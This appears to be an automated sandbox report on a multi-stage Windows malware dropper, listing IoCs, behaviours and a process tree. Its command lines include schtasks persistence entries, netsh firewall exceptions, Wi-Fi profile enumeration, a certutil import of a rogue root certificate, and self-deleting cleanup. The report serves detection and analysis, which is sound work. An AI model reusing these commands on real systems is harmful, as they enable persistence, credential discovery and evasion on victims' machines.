\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Amadeus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language videominimizer32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gweadtrgh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AutoUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 262965725.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hive%20Ransomware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tdrpload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AV_DOW~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bqkriy6l.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language av_downloader1.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language njrtdhadawt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hkbsse.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 13 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 46816 PING.EXE 27308 PING.EXE 11764 cmd.exe 11872 PING.EXE 12540 PING.EXE 4704 PING.EXE 6372 PING.EXE 1464 PING.EXE 24988 PING.EXE 26124 PING.EXE 11392 PING.EXE 4288 PING.EXE 5340 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4408 cmd.exe 1472 netsh.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 InstallUtil.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString InstallUtil.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 njrtdhadawt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString njrtdhadawt.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 1684 timeout.exe 2144 timeout.exe 5748 timeout.exe 5592 timeout.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 13180 systeminfo.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 windowsexecutable.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 windowsexecutable.exe -
Runs ping.exe 1 TTPs 12 IoCs
pid Process 12540 PING.EXE 6372 PING.EXE 1464 PING.EXE 46816 PING.EXE 27308 PING.EXE 11392 PING.EXE 11872 PING.EXE 4704 PING.EXE 4288 PING.EXE 5340 PING.EXE 24988 PING.EXE 26124 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1664 schtasks.exe 5232 schtasks.exe 5504 schtasks.exe 5604 schtasks.exe 4300 schtasks.exe 24616 schtasks.exe 25508 schtasks.exe 3744 schtasks.exe 6044 schtasks.exe 372 schtasks.exe 2172 schtasks.exe 1960 schtasks.exe 26892 schtasks.exe 27952 schtasks.exe 12120 schtasks.exe 5188 schtasks.exe 4764 schtasks.exe 13160 schtasks.exe 6760 schtasks.exe 6612 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4312 chrome11.exe 5272 1989129625.exe 5272 1989129625.exe 2920 bnkrigkawd.exe 2920 bnkrigkawd.exe 4960 steel.tmp 4960 steel.tmp 2920 bnkrigkawd.exe 2920 bnkrigkawd.exe 2920 bnkrigkawd.exe 4664 njrtdhadawt.exe 4664 njrtdhadawt.exe 2920 bnkrigkawd.exe 5596 3161510603.exe 5596 3161510603.exe 6112 powershell.exe 6112 powershell.exe 5304 random.exe 5304 random.exe 6112 powershell.exe 5596 3161510603.exe 5596 3161510603.exe 5856 InstallUtil.exe 5856 InstallUtil.exe 5856 InstallUtil.exe 5856 InstallUtil.exe 5856 InstallUtil.exe 5856 InstallUtil.exe 5760 winupsecvmgr.exe 5760 winupsecvmgr.exe 5924 powershell.exe 5924 powershell.exe 5924 powershell.exe 5760 winupsecvmgr.exe 5760 winupsecvmgr.exe 5760 winupsecvmgr.exe 5760 winupsecvmgr.exe 4312 conhost.exe 4312 conhost.exe 1516 powershell.exe 1516 powershell.exe 1516 powershell.exe 4556 powershell.exe 4556 powershell.exe 4556 powershell.exe 4312 conhost.exe 4312 conhost.exe 4688 ama.exe 4688 ama.exe 5504 defnur.exe 5504 defnur.exe 3272 zeropersca.exe 3272 zeropersca.exe 3272 zeropersca.exe 3272 zeropersca.exe 2128 fontdrvhost.exe 2128 fontdrvhost.exe 2312 powershell.exe 2312 powershell.exe 2128 fontdrvhost.exe 2128 fontdrvhost.exe 2312 powershell.exe 1564 powershell.exe 1564 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4940 Server1.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 228 4363463463464363463463463.exe Token: SeDebugPrivilege 2456 Registry.exe Token: SeDebugPrivilege 4852 Runtime Broker.exe Token: SeDebugPrivilege 4312 chrome11.exe Token: SeDebugPrivilege 2180 XClient.exe Token: SeDebugPrivilege 4940 Server1.exe Token: 33 4940 Server1.exe Token: SeIncBasePriorityPrivilege 4940 Server1.exe Token: 33 4940 Server1.exe Token: SeIncBasePriorityPrivilege 4940 Server1.exe Token: SeDebugPrivilege 2180 XClient.exe Token: SeDebugPrivilege 5272 1989129625.exe Token: 33 4940 Server1.exe Token: SeIncBasePriorityPrivilege 4940 Server1.exe Token: 33 4940 Server1.exe Token: SeIncBasePriorityPrivilege 4940 Server1.exe Token: SeDebugPrivilege 4228 Neverlose%20Loader.exe Token: SeDebugPrivilege 2920 bnkrigkawd.exe Token: SeAssignPrimaryTokenPrivilege 2920 bnkrigkawd.exe Token: SeIncreaseQuotaPrivilege 2920 bnkrigkawd.exe Token: SeSecurityPrivilege 2920 bnkrigkawd.exe Token: SeTakeOwnershipPrivilege 2920 bnkrigkawd.exe Token: SeLoadDriverPrivilege 2920 bnkrigkawd.exe Token: SeSystemtimePrivilege 2920 bnkrigkawd.exe Token: SeBackupPrivilege 2920 bnkrigkawd.exe Token: SeRestorePrivilege 2920 bnkrigkawd.exe Token: SeShutdownPrivilege 2920 bnkrigkawd.exe Token: SeSystemEnvironmentPrivilege 2920 bnkrigkawd.exe Token: SeUndockPrivilege 2920 bnkrigkawd.exe Token: SeManageVolumePrivilege 2920 bnkrigkawd.exe Token: 33 4940 Server1.exe Token: SeIncBasePriorityPrivilege 4940 Server1.exe Token: SeDebugPrivilege 3364 bqkriy6l.exe Token: 33 4940 Server1.exe Token: SeIncBasePriorityPrivilege 4940 Server1.exe Token: SeDebugPrivilege 6112 powershell.exe Token: SeIncreaseQuotaPrivilege 6112 powershell.exe Token: SeSecurityPrivilege 6112 powershell.exe Token: SeTakeOwnershipPrivilege 6112 powershell.exe Token: SeLoadDriverPrivilege 6112 powershell.exe Token: SeSystemProfilePrivilege 6112 powershell.exe Token: SeSystemtimePrivilege 6112 powershell.exe Token: SeProfSingleProcessPrivilege 6112 powershell.exe Token: SeIncBasePriorityPrivilege 6112 powershell.exe Token: SeCreatePagefilePrivilege 6112 powershell.exe Token: SeBackupPrivilege 6112 powershell.exe Token: SeRestorePrivilege 6112 powershell.exe Token: SeShutdownPrivilege 6112 powershell.exe Token: SeDebugPrivilege 6112 powershell.exe Token: SeSystemEnvironmentPrivilege 6112 powershell.exe Token: SeRemoteShutdownPrivilege 6112 powershell.exe Token: SeUndockPrivilege 6112 powershell.exe Token: SeManageVolumePrivilege 6112 powershell.exe Token: 33 6112 powershell.exe Token: 34 6112 powershell.exe Token: 35 6112 powershell.exe Token: 36 6112 powershell.exe Token: SeIncreaseQuotaPrivilege 6112 powershell.exe Token: SeSecurityPrivilege 6112 powershell.exe Token: SeTakeOwnershipPrivilege 6112 powershell.exe Token: SeLoadDriverPrivilege 6112 powershell.exe Token: SeSystemProfilePrivilege 6112 powershell.exe Token: SeSystemtimePrivilege 6112 powershell.exe Token: SeProfSingleProcessPrivilege 6112 powershell.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 4852 Runtime Broker.exe 5308 FDR9876567000.exe 5308 FDR9876567000.exe 5216 ectosphere.exe 5216 ectosphere.exe 5712 ectosphere.exe 5712 ectosphere.exe 4960 steel.tmp -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 4852 Runtime Broker.exe 5308 FDR9876567000.exe 5308 FDR9876567000.exe 5216 ectosphere.exe 5216 ectosphere.exe 5712 ectosphere.exe 5712 ectosphere.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2308 RuntimeBroker.exe 1864 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 228 wrote to memory of 2456 228 4363463463464363463463463.exe 83 PID 228 wrote to memory of 2456 228 4363463463464363463463463.exe 83 PID 2456 wrote to memory of 1664 2456 Registry.exe 84 PID 2456 wrote to memory of 1664 2456 Registry.exe 84 PID 2456 wrote to memory of 4852 2456 Registry.exe 86 PID 2456 wrote to memory of 4852 2456 Registry.exe 86 PID 228 wrote to memory of 2236 228 4363463463464363463463463.exe 87 PID 228 wrote to memory of 2236 228 4363463463464363463463463.exe 87 PID 4852 wrote to memory of 3744 4852 Runtime Broker.exe 89 PID 4852 wrote to memory of 3744 4852 Runtime Broker.exe 89 PID 228 wrote to memory of 4312 228 4363463463464363463463463.exe 91 PID 228 wrote to memory of 4312 228 4363463463464363463463463.exe 91 PID 228 wrote to memory of 4940 228 4363463463464363463463463.exe 92 PID 228 wrote to memory of 4940 228 4363463463464363463463463.exe 92 PID 228 wrote to memory of 4940 228 4363463463464363463463463.exe 92 PID 228 wrote to memory of 2724 228 4363463463464363463463463.exe 94 PID 228 wrote to memory of 2724 228 4363463463464363463463463.exe 94 PID 228 wrote to memory of 2724 228 4363463463464363463463463.exe 94 PID 4940 wrote to memory of 2884 4940 Server1.exe 97 PID 4940 wrote to memory of 2884 4940 Server1.exe 97 PID 4940 wrote to memory of 2884 4940 Server1.exe 97 PID 4312 wrote to memory of 3020 4312 chrome11.exe 99 PID 4312 wrote to memory of 3020 4312 chrome11.exe 99 PID 228 wrote to memory of 4560 228 4363463463464363463463463.exe 101 PID 228 wrote to memory of 4560 228 4363463463464363463463463.exe 101 PID 228 wrote to memory of 2180 228 4363463463464363463463463.exe 104 PID 228 wrote to memory of 2180 228 4363463463464363463463463.exe 104 PID 228 wrote to memory of 3648 228 4363463463464363463463463.exe 105 PID 228 wrote to memory of 3648 228 4363463463464363463463463.exe 105 PID 228 wrote to memory of 3648 228 4363463463464363463463463.exe 105 PID 228 wrote to memory of 2532 228 4363463463464363463463463.exe 108 PID 228 wrote to memory of 2532 228 4363463463464363463463463.exe 108 PID 3648 wrote to memory of 5236 3648 pp.exe 109 PID 3648 wrote to memory of 5236 3648 pp.exe 109 PID 3648 wrote to memory of 5236 3648 pp.exe 109 PID 2180 wrote to memory of 5188 2180 XClient.exe 110 PID 2180 wrote to memory of 5188 2180 XClient.exe 110 PID 5236 wrote to memory of 6056 5236 2910514938.exe 112 PID 5236 wrote to memory of 6056 5236 2910514938.exe 112 PID 5236 wrote to memory of 6056 5236 2910514938.exe 112 PID 228 wrote to memory of 1888 228 4363463463464363463463463.exe 115 PID 228 wrote to memory of 1888 228 4363463463464363463463463.exe 115 PID 228 wrote to memory of 1888 228 4363463463464363463463463.exe 115 PID 6056 wrote to memory of 5272 6056 sysnldcvmr.exe 116 PID 6056 wrote to memory of 5272 6056 sysnldcvmr.exe 116 PID 5272 wrote to memory of 5468 5272 1989129625.exe 117 PID 5272 wrote to memory of 5468 5272 1989129625.exe 117 PID 5272 wrote to memory of 5812 5272 1989129625.exe 119 PID 5272 wrote to memory of 5812 5272 1989129625.exe 119 PID 5468 wrote to memory of 2292 5468 cmd.exe 121 PID 5468 wrote to memory of 2292 5468 cmd.exe 121 PID 5812 wrote to memory of 2028 5812 cmd.exe 122 PID 5812 wrote to memory of 2028 5812 cmd.exe 122 PID 6056 wrote to memory of 5620 6056 sysnldcvmr.exe 123 PID 6056 wrote to memory of 5620 6056 sysnldcvmr.exe 123 PID 6056 wrote to memory of 5620 6056 sysnldcvmr.exe 123 PID 228 wrote to memory of 5236 228 4363463463464363463463463.exe 124 PID 228 wrote to memory of 5236 228 4363463463464363463463463.exe 124 PID 1888 wrote to memory of 5684 1888 Amadeus.exe 125 PID 1888 wrote to memory of 5684 1888 Amadeus.exe 125 PID 1888 wrote to memory of 5684 1888 Amadeus.exe 125 PID 228 wrote to memory of 5788 228 4363463463464363463463463.exe 126 PID 228 wrote to memory of 5788 228 4363463463464363463463463.exe 126 PID 1888 wrote to memory of 5684 1888 Amadeus.exe 125 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5752 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2988
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2128
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3420
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe"C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1664
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
PID:2236
-
-
C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe"C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\System32\certutil.exe"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmpE0EC.tmp"4⤵PID:3020
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe" "Server1.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2884
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe"C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2724
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test14.exe"C:\Users\Admin\AppData\Local\Temp\Files\test14.exe"3⤵
- Executes dropped EXE
PID:4560
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5188
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\2910514938.exeC:\Users\Admin\AppData\Local\Temp\2910514938.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5236 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6056 -
C:\Users\Admin\AppData\Local\Temp\1989129625.exeC:\Users\Admin\AppData\Local\Temp\1989129625.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5272 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵
- Suspicious use of WriteProcessMemory
PID:5468 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:2292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"7⤵
- Suspicious use of WriteProcessMemory
PID:5812 -
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:2028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2309417675.exeC:\Users\Admin\AppData\Local\Temp\2309417675.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5620 -
C:\Users\Admin\AppData\Local\Temp\3161510603.exeC:\Users\Admin\AppData\Local\Temp\3161510603.exe7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5596
-
-
-
C:\Users\Admin\AppData\Local\Temp\262965725.exeC:\Users\Admin\AppData\Local\Temp\262965725.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1012
-
-
C:\Users\Admin\AppData\Local\Temp\281730318.exeC:\Users\Admin\AppData\Local\Temp\281730318.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5536
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"3⤵
- Executes dropped EXE
PID:2532
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe"C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5684
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"3⤵
- Executes dropped EXE
PID:5236
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe"C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe"3⤵
- Executes dropped EXE
PID:5788
-
-
C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5308 -
C:\Users\Admin\AppData\Local\snails\ectosphere.exe"C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"4⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5216 -
C:\Users\Admin\AppData\Local\snails\ectosphere.exe"C:\Users\Admin\AppData\Local\snails\ectosphere.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5712
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3488 -
C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp"C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp" /SL5="$7021A,3924197,54272,C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4960 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "video_minimizer_12125"5⤵
- System Location Discovery: System Language Discovery
PID:4536
-
-
C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe"C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe" -i5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2920 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4408 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:5764
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1472
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵PID:1092
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵PID:5744
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:5124
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1632
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵PID:6100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"4⤵PID:1116
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:5412
-
-
C:\Windows\system32\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
PID:1684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe"C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4056 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & rd /s /q "C:\ProgramData\JKEGDHCFCAAE" & exit5⤵
- System Location Discovery: System Language Discovery
PID:5636 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5592
-
-
-
-
-
